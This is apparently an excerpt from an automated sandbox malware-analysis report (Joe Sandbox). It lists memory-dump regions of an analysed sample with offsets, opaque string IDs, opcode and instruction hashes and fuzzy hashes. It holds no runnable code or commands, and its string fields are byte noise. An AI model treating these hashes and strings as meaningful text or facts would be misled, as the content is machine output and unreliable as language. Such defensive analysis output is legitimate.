                • Source File: 00000000.00000002.438871522.000000000B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_b390000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID: "F$L:*S$L:*S$L:*S$T}A$cEVT$k8w[$qrA&$sVYZ$Q<
                • API String ID: 0-3557550785
                • Opcode ID: d7cf828abe59e57d32d2b311ed7502453847c6447fe77ff8d69b075cda7684e4
                • Instruction ID: 66b16753fa094eee98541ecca2b1179bdf7f45a35cfff9f5bd592ccda5aeeb9d
                • Opcode Fuzzy Hash: d7cf828abe59e57d32d2b311ed7502453847c6447fe77ff8d69b075cda7684e4
                • Instruction Fuzzy Hash: CF726A74A04229CFCB64DF58E998B9DB7B2FB98300F2081D9D41AAB354DB309E81CF51
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.438871522.000000000B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_b390000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID: "F$L:*S$L:*S$L:*S$T}A$cEVT$k8w[$qrA&$sVYZ$Q<
                • API String ID: 0-3557550785
                • Opcode ID: 51e5c8f99fa79729b9b0c714d5de1e798ffad292d6f32505d62a53cf0017916c
                • Instruction ID: 8995944154562ee870c6d7dcd935156a9867e5894b20218f4f723866067a1f96
                • Opcode Fuzzy Hash: 51e5c8f99fa79729b9b0c714d5de1e798ffad292d6f32505d62a53cf0017916c
                • Instruction Fuzzy Hash: D1726A74A04229CFDB64DF58E998B9DB7B2FB98700F2081D9D41AAB354DB309E81CF51
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.438871522.000000000B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_b390000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID: "F$L:*S$L:*S$L:*S$T}A$cEVT$k8w[$qrA&$Q<
                • API String ID: 0-2839657297
                • Opcode ID: fc6f4e93c022ce4f1a29a66e65252fd62d86d20ce5d6a2eb2ffda3cb7591c2af
                • Instruction ID: 4b2e2c652a9e412fc0c4ed7cca7fdbf827039cde52e2cd3580e1961304d4b634
                • Opcode Fuzzy Hash: fc6f4e93c022ce4f1a29a66e65252fd62d86d20ce5d6a2eb2ffda3cb7591c2af
                • Instruction Fuzzy Hash: 38625B74A04229CFDB64DF58E998B9DB7B2FB98700F2081D9D41AAB354DB309E81CF51
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.438871522.000000000B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_b390000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID: "F$L:*S$L:*S$L:*S$T}A$cEVT$k8w[$qrA&$Q<
                • API String ID: 0-2839657297
                • Opcode ID: d52ddaf393f7fe6c1bacb96784934c91cfb723f2a34f34b3d9d3412f9ffa7b01
                • Instruction ID: 3b5afa296b7d5b21f09cc6fd61ff374a1532f869b62d62b142f20dfb78e74192
                • Opcode Fuzzy Hash: d52ddaf393f7fe6c1bacb96784934c91cfb723f2a34f34b3d9d3412f9ffa7b01
                • Instruction Fuzzy Hash: 26625A74A04229CFDB64DF58E998B9DB7B2FB98700F2081D9D41AAB354DB309E81CF51
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.438871522.000000000B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_b390000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID: L:*S$L:*S$L:*S$cEVT$qrA&$Q<
                • API String ID: 0-725065920
                • Opcode ID: 81610a5997fbd2a985215d4da7434aa36f4f7a76897dd14f1e1e993fe6486880
                • Instruction ID: 47355aa7d724c1698a6cdcab577e70ca64794f45e6b29221ac1c47dbf226353d
                • Opcode Fuzzy Hash: 81610a5997fbd2a985215d4da7434aa36f4f7a76897dd14f1e1e993fe6486880
                • Instruction Fuzzy Hash: 19424974A04229CFDB64DF54E998BADB7B6FB98300F2081D9D41AAB754DB309E81CF41
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.438871522.000000000B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_b390000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID: L:*S$L:*S$L:*S$cEVT$qrA&$Q<
                • API String ID: 0-725065920
                • Opcode ID: 325816012e7233af3ce371a4d4021f57715e4b496648963b09fa6f05eca7d6bf
                • Instruction ID: 19dd79e4c2eab62e566ee709caba3dd7a0adbb54dd5362a2868bfde7ca772c99
                • Opcode Fuzzy Hash: 325816012e7233af3ce371a4d4021f57715e4b496648963b09fa6f05eca7d6bf
                • Instruction Fuzzy Hash: 5B424974A04229CFDB64DF54E998BADB7B6FB98300F2081D9D41AAB754DB309E81CF41
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID: #RH$$#&b$5cgu$5cgu$hE
                • API String ID: 0-1348839357
                • Opcode ID: c27330d0e54f315e1651347a9ec16d9704bd29326bc8aea101eda34973aea1f3
                • Instruction ID: 490befbe51a689a3460a5fe193bd44150ca9ef14e90f4f00662d6fb9f711913a
                • Opcode Fuzzy Hash: c27330d0e54f315e1651347a9ec16d9704bd29326bc8aea101eda34973aea1f3
                • Instruction Fuzzy Hash: 8CD15F78B001158FDB58DFA8A81835EB7B3BBC9211F258469D80EEB758DF349D468F81
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.438871522.000000000B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_b390000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID: cEVT$qrA&$Q<
                • API String ID: 0-697639764
                • Opcode ID: f30e1a52a89ad47238820778cc439d9c80f539cd182e7a5c0dda4b14a8d3c07e
                • Instruction ID: 296014d53b9c180d2f177d41c2fc6235bf79fd78a1fa0a3ba545f2259a055c7a
                • Opcode Fuzzy Hash: f30e1a52a89ad47238820778cc439d9c80f539cd182e7a5c0dda4b14a8d3c07e
                • Instruction Fuzzy Hash: 3D224B74A04229CFDB64DF54E998B9DB7B6FB98300F2082D9D41AAB754DB309E81CF41
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.438871522.000000000B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_b390000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID: cEVT$qrA&$Q<
                • API String ID: 0-697639764
                • Opcode ID: 18e92bb393c5316f25d8f850902a8ee3d8593f645b3b76d559f717c616d360ff
                • Instruction ID: a0ae8d443f428c37f7f89bd11d66b58fb65202fa06e4520603888c40eaf63e24
                • Opcode Fuzzy Hash: 18e92bb393c5316f25d8f850902a8ee3d8593f645b3b76d559f717c616d360ff
                • Instruction Fuzzy Hash: 80224B74A04229CFDB64DF54E998B9DB7B6FB98300F2082D9D41AAB754DB309E81CF41
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.438871522.000000000B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_b390000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID: cEVT$qrA&
                • API String ID: 0-3193502352
                • Opcode ID: 059796fe14ebf40d66d7aa2cbf078065ab6c1334f992c9e2ded1b1e258be65e5
                • Instruction ID: 03015fcb4b1a5ec4a6580e93f502b60f6b59d59cd2b299d7ab3e5c66b09add73
                • Opcode Fuzzy Hash: 059796fe14ebf40d66d7aa2cbf078065ab6c1334f992c9e2ded1b1e258be65e5
                • Instruction Fuzzy Hash: B0D11874A04229CFCB64DF54E988B9DB7B6FB98300F2086D9D41AAB754DB309E81CF51
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.438871522.000000000B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_b390000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID: cEVT$qrA&
                • API String ID: 0-3193502352
                • Opcode ID: a35959280cdd9b211f5b0ace54e75c179dfcd8b50bb891bfc404b2bb91ef3f8c
                • Instruction ID: ddab904980316ae1b705ee2dcafd8aedde3397eb17d25715cbc89b3fd855a329
                • Opcode Fuzzy Hash: a35959280cdd9b211f5b0ace54e75c179dfcd8b50bb891bfc404b2bb91ef3f8c
                • Instruction Fuzzy Hash: 78D11874A04229CFCB64DF54E988B9DB7B6FB98300F2086D9D41AAB754DB309E81CF51
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID: d-9&$?|
                • API String ID: 0-3371686692
                • Opcode ID: 4d1fc1f39127d6e22506301c3e36cc7d394d1acd5cf665a68d7542b3f368bf41
                • Instruction ID: a93059bb3f92ff71963fd160ff7b6ce1c69278155b09aac2ad271563bb264f97
                • Opcode Fuzzy Hash: 4d1fc1f39127d6e22506301c3e36cc7d394d1acd5cf665a68d7542b3f368bf41
                • Instruction Fuzzy Hash: BBA1B170B006119BCB19CF69C5909AEF7E2BBC4304B68CA2ED0669F655D730EE05CF94
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID: ?|
                • API String ID: 0-604831152
                • Opcode ID: 2136b72fa93ccdc96ebb07d44acc7e56237ada642b32b68322576d0876ec1dd1
                • Instruction ID: 1e68e14bef72bfe51aca0dc5a80e3b2857243ee3761e659ba8448cb5ef4d577b
                • Opcode Fuzzy Hash: 2136b72fa93ccdc96ebb07d44acc7e56237ada642b32b68322576d0876ec1dd1
                • Instruction Fuzzy Hash: 01C1E371A046519FC716CF68C8905AAFBF2BFC53007688A6ED096DF256D730EE05CB94
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID: ez
                • API String ID: 0-1859683672
                • Opcode ID: c8d9e11ef8f1fd690e5541e44c155f20ab5592f40c0e75b6e08ca5074052e5bf
                • Instruction ID: b6dadea24c9ed5678dfffe3b59c75fbf0099cb1d72069fb1d3a19aaf704bd131
                • Opcode Fuzzy Hash: c8d9e11ef8f1fd690e5541e44c155f20ab5592f40c0e75b6e08ca5074052e5bf
                • Instruction Fuzzy Hash: 16712331604206CFC795CF69C8849AABBF5FFC2360B058D6AD056CF661D338E946CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID: ez
                • API String ID: 0-1859683672
                • Opcode ID: 904a42f060535b57981f84db8812e275886fbc639e429953cf83f0c6014e2175
                • Instruction ID: 8377bc30b796e41147a4f3697fc07f50dd429b48eb1f96e41d70a9ff3a9facda
                • Opcode Fuzzy Hash: 904a42f060535b57981f84db8812e275886fbc639e429953cf83f0c6014e2175
                • Instruction Fuzzy Hash: F0417C31A04606CFCB91CB69C989A6AB7F2FFC5360B14CD6AD06ACB654E234E941CF11
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID: fK
                • API String ID: 0-1704958051
                • Opcode ID: 2eae4cf0ce93e3653046207fe24d764f8e9abe7e94e498d0f92c5e381af1df62
                • Instruction ID: e090e83a2a813dc2b98130273a494d7b21585a1ee3d7c056d25ca28e99f7f4c3
                • Opcode Fuzzy Hash: 2eae4cf0ce93e3653046207fe24d764f8e9abe7e94e498d0f92c5e381af1df62
                • Instruction Fuzzy Hash: C531A774E00229CFCB54CF99C880AAEFBF2BB89300F548695E459EB245D730E981CF55
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 69b761e6d1f157880b80c059f8bcfed93f2f4b30d40c95c2e4966c00b0910ada
                • Instruction ID: 3907a3d29f7b68e1581987d625e11782b0b30eb3ab72e18d9cc681a9b3eb7250
                • Opcode Fuzzy Hash: 69b761e6d1f157880b80c059f8bcfed93f2f4b30d40c95c2e4966c00b0910ada
                • Instruction Fuzzy Hash: C812C2B0525F459BF710CFA5E84A2893FA9B745318F544308F3A91FAE1DBB9118ACF44
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 11127995ef4e527f245412afca1dad79d8922f7d39ff5ca8e6d92b269afb69eb
                • Instruction ID: af0b9bad650f7457c4a178e587528c6b032fb0948d715426aeec0af5d2d56db3
                • Opcode Fuzzy Hash: 11127995ef4e527f245412afca1dad79d8922f7d39ff5ca8e6d92b269afb69eb
                • Instruction Fuzzy Hash: 14B1DE30A146158FCB26CB28C5849AEFBF2BFC9300B58CE2AD4569F659D735ED04CB94
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.438871522.000000000B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_b390000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e326a03add220a23c85785aad074c72bfe4126b9e722b9f02a8a6f74112c670a
                • Instruction ID: 79668a5fffd40f6b7680db57724eff1d7e98def6b8aff2ea1eecef129e5fb7e2
                • Opcode Fuzzy Hash: e326a03add220a23c85785aad074c72bfe4126b9e722b9f02a8a6f74112c670a
                • Instruction Fuzzy Hash: B0D1F931C2075A8AC710EFA5C9906D9B7B5FF99300F509B9AE1093B225EB706AC9CF50
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.438871522.000000000B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_b390000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ffa996f6b3cc44c93131ad2079c935caf8d065e8f3dfb5ba4c5a2ac9db42d5d1
                • Instruction ID: 781419a580577a2a49dca218f5828a5a16b9d0c66303457f318f8e3c5b5cc4f8
                • Opcode Fuzzy Hash: ffa996f6b3cc44c93131ad2079c935caf8d065e8f3dfb5ba4c5a2ac9db42d5d1
                • Instruction Fuzzy Hash: C5D1E931C2075A8AC710EFA5C9906D9B7B5FF99200F509B9AE5093B215FB706AC9CF50
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: eca779e2a04bd03b78715e157a46fd783f06f46a4f1bf6c5835491ee1342fd3a
                • Instruction ID: a3194aed747304a7523ee87b1fe6c4fa0dcadcc87160aea302b70bd46241e777
                • Opcode Fuzzy Hash: eca779e2a04bd03b78715e157a46fd783f06f46a4f1bf6c5835491ee1342fd3a
                • Instruction Fuzzy Hash: 3DA1BF31A246158BDB16CB68C5809AEF7F3BFC4304B18DA2AD056DB659E734FD04CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 90779e961a016288e2a3631deec89cb81277a4dca3259b26a4739efc14f146fb
                • Instruction ID: 1d47a62764ffb68dbf4785144f7eb2f5e4aff405511db28328ffee07e186c02e
                • Opcode Fuzzy Hash: 90779e961a016288e2a3631deec89cb81277a4dca3259b26a4739efc14f146fb
                • Instruction Fuzzy Hash: 47A1F330624626CBCB56CB68C5805AEFBF2BFC4301B18DE2AD0569F655E334EE04CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4e5f1b165008761397a6c2639724fdb3f5762a3cf8b7f0da0ac8a8b6602d9bc2
                • Instruction ID: 68c7c692d78a27f3de27fa1fdea08f7a1d70e4fc39ac1553238f545ef17c115d
                • Opcode Fuzzy Hash: 4e5f1b165008761397a6c2639724fdb3f5762a3cf8b7f0da0ac8a8b6602d9bc2
                • Instruction Fuzzy Hash: C7C106B0920B458BF710CFA5E84A1893FB9BB95318F544318E3652FAD0DFB9558ACF44
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ad1ae7c6e52cc49d0fee46416e8e670d30092682575405d803b95eca95713d49
                • Instruction ID: 0d392a637def2c3d5bfb5e30e9c92c0f9d46b6820dd0e52cc87e8af1c13574ff
                • Opcode Fuzzy Hash: ad1ae7c6e52cc49d0fee46416e8e670d30092682575405d803b95eca95713d49
                • Instruction Fuzzy Hash: 1571CF72F1525A8FCB44CF69C8915AAFBF6FBCA210B158426D905EF251C234DD12CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 009a33d683a54a267e3eb40110f50936288605a6bdb746ffc73a5a718afe8a69
                • Instruction ID: abfb0c7ea1c52663aa81b62b9636eb3062702b455c8efac13ca40b082fedcbfc
                • Opcode Fuzzy Hash: 009a33d683a54a267e3eb40110f50936288605a6bdb746ffc73a5a718afe8a69
                • Instruction Fuzzy Hash: D541C172F2525A8FCB44CF68C9915AEFBF2FBCA210B168526D505EF251C234DD11CB52
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 519afa16e198dae87c7c0b26eb3ce66c8475b010bce7b62d47c79d08602dbca2
                • Instruction ID: f2979eda0b513cd59d0ac4bf7e397ea53b4f8ddd1f0589ad990fbae477e56c50
                • Opcode Fuzzy Hash: 519afa16e198dae87c7c0b26eb3ce66c8475b010bce7b62d47c79d08602dbca2
                • Instruction Fuzzy Hash: 223190B15487819FCB45CF34C8D44D6BBABFBD5220719C5A9EC904E60AD339B80ADB30
                Uniqueness

                Uniqueness Score: -1.00%